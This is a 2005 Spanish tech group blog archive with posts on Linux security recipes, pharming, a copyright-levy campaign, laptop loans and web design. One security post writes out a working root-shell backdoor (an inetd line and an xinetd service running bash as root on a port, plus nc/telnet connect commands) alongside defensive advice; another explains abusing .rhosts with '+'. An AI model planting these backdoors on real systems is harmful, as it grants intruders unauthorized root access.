Autor: gacuj | Archivado en: General, Linux, Seguridad el día 30/Mar/2005
Descripción:
Un método utilizado por los hackers para dejar una puerta trasera es una root shell. Se trata de dejar escuchando un puerto determinado poco conocido y hacer que al conectarnos a él nos devuelva una shell de root.
Imaginemos el caso más simple (en posteriores recetas comentaremos otros casos): el hacker tiene login en el sistema.
Vamos a hacerlo para aquellas configuraciones con inetd y con xinetd:
- inetd, se trata de añadir al fichero /etc/inetd.conf la siguiente línea:
ingreslock stream tcp nowait root /bin/bash -i
Hemos escogido el servicio ingreslock. /bin/bash -i nos devuelve una shell interactiva como root al conectarnos al puerto ingreslock.
- xinetd, se trata de crear un servicio bajo /etc/xinetd.d como por ejemplo:
service prueba
{
type = UNLISTED
id = prueba-stream
socket_type = stream
protocol = tcp
user = root
server = /bin/bash
server_args = -i
port = 60180
wait = no
disable = no
}
Es decir nos conectaríamos al puerto 60180 para obtener una sheel de root interactiva
De esta forma y considerando el segundo caso tan solo tendríamos que ejecutar:
telnet nombre_host 60180
o
si hacemos uso de nc,
nc -vv nombre_host 60180
para obtener la shell de root
¿ Da alguna idea a alguien que actualmente es administrador para el futuro?
Solución:
- Eliminar todos los servicios que no se utilizan.
- Hacer uso de herramientas de integridad de ficheros sobre los ficheros de configuración de servicios.
- Realizar testeo frecuente de puertos abiertos
Autor: S3rGy0 | Archivado en: General el día 30/Mar/2005
Desde el magnífico blog de David Bravo nos llega esta noticia: la Federación de Consumidores en Acción (FACUA) ha comenzado una campaña contra la Ley de Propiedad Intelectual con el fin de eliminar el canon impuesto a CDs y DVDs, así como los sistemas anticopias, argumentando que éstos limitan los derechos de los usuarios.
Para ello están recogiendo firmas en su web, además de haber mandado una carta a los ministerios de Cultura, Sanidad y Consumo e Industria. Para más información podéis visitar la web de FACUA.
S3rGy0.
Autor: Edu | Archivado en: General, Hardware, Recursos el día 30/Mar/2005
En España hemos dado otro paso, de la mano de algunos ministerios y la entidad pública Red.es, ha surgido la iniciativa “Familias conectadas”, la cual se encuentra integrada en el programa “Internet en el Aula”. Mediante ella, aquellas familias con hijos que lo deseen, podrán optar a uno de los 100.000 préstamos de mil euros para comprar un ordenador portátil con conexión de banda ancha a Internet. La financiación consistirá en el pago de la cantidad sin intereses durante los tres años siguientes a su compra.
Creo que es una buena iniciativa por parte del gobierno para intentar incrementar nuestra situación tecnológica frente a la comunidad europea.
Podemos ver más información en esta página.
Autor: jgarcia | Archivado en: Diseño Web, Internet el día 30/Mar/2005
El chileno Felipe Vera es el responsable de AIWeb. Esta interesante bitácora donde analiza con detalle la Arquitectura de la Información y la usabilidad web.
Pero…¿Qué es la Arquitectura de la Información? según el mismo Felipe es “la disciplina encargada de estructurar, organizar y etiquetar el contenido como también establecer los puntos de acceso, sistemas de busqueda y recuperación de información de cualquier aplicación soportada en la web, con el fin de que el usuario cumpla con los objetivos y su experiencia sea optima“.
Amigos, y es que la aplicación de la Ingeniería del Software en los desarrollos webs es de vital importancia para que el producto final alcance la calidad deseada. No podemos caer en la tentación de acometer la codificación de un proyecto web sin un estudio previo: análisis previo, análisis detallado, diseño… y cuando la solución esté completamente definida, entonces será el momento de comenzar codificar.
Es cierto, que los desarrollos web debemos hacerlos para ayer… es imperativo minimizar el tiempo de desarrollo para que los costes no se disparen y el precio del proyecto sea competitivo. Todos conocemos el altísimo grado de intrusismo que tiene esta profesión y eso hace mucho daño al sector, eso provoca situaciones como las que comenta nuestro amigo Loren en su artículo “¿Programador Web?“, en la que hace una comparación entre lo que cobra un fontanero y lo que cobra un desarrollador web. Aun así, la utilización de una metodología, con unas pautas bien definidas será la razón nuestro éxito y el elemento diferenciador con la competencia.
Autor: jgarcia | Archivado en: BdW, Internet el día 30/Mar/2005
Cada día son más usuarios los que utilizan Mozilla como browser por defecto para navegar por la extensa maraña de la Red, pero aun son muchos más los que continuan utilizando el Microsoft Internet Explorer…¿Por qué será esto? Son muchas las ventajas las que ofrece Mozilla y sin embargo no termina de extenderse su uso como cabría esperar.
Lo mismo pasa con el sistema operativo gratuito Linux… cada día es más fácil de instalar y usar, pero los usuarios por el momento prefieren el Microsoft Windows XP, que es de pago 8O.
Las estadísticas de accesos a BdW son:
Autor: admin | Archivado en: CSS, HTML el día 29/Mar/2005
Hace ya bastante tiempo que llevo siguiendo esta interesante lista de correo, orientada sobretodo al mundo IT, también se publican noticias relacionadas al mundo GNU/Linux, lo cual capto mi atención de inmediato. Pero este artículo no tratará sobre el excelente contenido que presenta regularmente Carlos Tori (el hombre detrás de NNL Newsletter), este artículo tratará más bien una propuesta de rediseño en los boletines que se presentan.
Comenzamos
Si observamos los boletines que presenta NNL Newsletter podemos darnos cuenta que aún mantienen el formato usual de mensajes de correo electrónico, todo esto a pesar del avance que ha presentado la lista, ahora se puede catalogar como un sitio web en donde se podrá leer noticias interesantes, dichas noticias aparecen cada cierto tiempo, agrupadas en un mismo documento, al final de cada documento se anexa el soporte que le ha brindado Carlos Tori a sus fervientes lectores.
Desde mi perspectiva debe darse un “lavado de cara” al Newsletter. Comencemos por la semántica de los documentos. Tomaré como muestra el NNL Newsletter » 1.
Autor: gacuj | Archivado en: General, Seguridad el día 29/Mar/2005
Se trata de un término de moda que hace referencia a la manipulación maliciosa de las direcciones DNS de las que hace uso el usuario en su máquina con el fin de obtener datos privados del mismo, principalmente de banca on line. Este envenenamiento de direcciones puede producirse en el servidor DNS que utiliza el usuario o en el mismo fichero hosts del PC del usuario.
Las técnicas utilizadas para llevar a cabo este envenenamiento pueden ser muy variadas, destacando el uso de troyanos.
A nivel de usuario se recomienda:
- Utilizar un software antimalware que combine sistemas de detección proactivos y reactivos: la forma más sencilla de manipular un ordenador para que sea víctima del pharming es a través de un código malicioso, generalmente troyanos. Es muy recomendable utilizar sistemas de protección pro-activos, capaces de adelantarse a las amenazas y bloquearlas analizando simplemente su comportamiento.
- Instalar un firewall personal: con esta precaución se evita que un hacker pueda entrar en el ordenador a través de un puerto de comunicaciones desprotegido, y modificar el sistema.
- Actualizar regularmente el software instalado en el equipo o tener activados los sistemas de actualización automática, de forma que no existan vulnerabilidades que pueden ser aprovechadas para realizar este tipo de ataques.
Más info:
Panda
Autor: jgarcia | Archivado en: BdW, Diseño Web, General, Internet el día 28/Mar/2005
Desde Medellín (Colombia), Arte Dinámico nos ha elegido la web de la semana.
Arte Dinámico es una web dedicada al diseño en general, donde podemos encontrar las siguientes secciones: Noticias, eventos, tutoriales, libros, diccionarios, artículos, estudios, directorio, foros, tips y galería.
Gracias Edison por elegir nuestra web.
Autor: S3rGy0 | Archivado en: Internet el día 28/Mar/2005
Ha salido un nuevo programa para descargar ficheros desde cuentas de correo de gran capacidad. La principal ventaja que tiene con respecto a peer2mail es que aprovecha mejor el ancho de banda. Además es más fácil de utilizar ya que, al igual que con bittorrent, sólo hay que descargarse un fichero .durie y en este fichero se encuentran (encriptados) el usuario y contraseña de la cuenta de correo.
Los anuncios de descargas desde este programa se encuentran disponibles en las webs dedicadas al p2m (en este blog tenéis disponible un post con unos cuantos enlaces) y en la misma web oficial del programa.
Actualmente sólo soporta los servidores Walla, Gawab y Xasamail. Imagino que Gmail no está incluido por los continuos bloqueos de cuentas que se producen. En cualquier caso es de esperar que progresivamente vayan ampliando el número de servidores ya que la actual versión es Beta.
Por último comentar que con algunas IPs da fallos de conexión, aunque este problema se puede solucionar fácilmente usando un proxy anónimo.
Creo que este programa apunta muy bien ya que aún estando en fase de desarrollo da resultados muy buenos. Esperemos que los desarrolladores se lo curren y sigan añadiendole más características a esta aplicación. Más información en progmaq.com
S3rGy0.
Autor: gacuj | Archivado en: General, Linux, Seguridad el día 28/Mar/2005
Descripción:
Los comandos rlogin, rcp y rsh son utilizados para login, copia y ejecución de comandos remota entre dos hosts. Facilitan las tareas de red al no solicitar password. Estos comandos consultan los ficheros /etc/hosts.allow, /etc/hosts.equiv y el fichero de usuario .rhosts para conceder permiso en la ejecución. El primer fichero hace referencia a hosts y servicios permitidos o denegados y el segundo a hosts y usuarios permitidos.
Las consecuencias en seguridad son evidentes. Imaginad un hacker que accede a un host y sabe que desde éste se pueden ejecutar comandos r en otros hosts que confian en el anterior. O un hacker que introduce la cadena + en el fichero .rhosts, haciendo de esta forma posible la ejecución de comandos r para cualquier host.
Un buen uso de la vulnerabilidad en seguridad que representan los comandos r la encontramos en el famoso ataque de Mitnick-Shimomura
Solución:
La solución más drástica pasa por no hacer uso de estos comandos. Para ello deshabilitaríamos su ejecución en inetd o xinetd.
Sin ser tan drásticos podemos:
- controlar con una herramienta de integridad de ficheros los archivos clave: /etc/hosts.allow, /etc/hosts.deny, /etc/hosts.equiv y .rhosts.
- Hacer uso de la gestión de atributos de ficheros para hacer a estos ficheros clave no modificables mediante chattr +i
Más info
tldp.org
Receta de seguridad XXIV: añadir rootshells
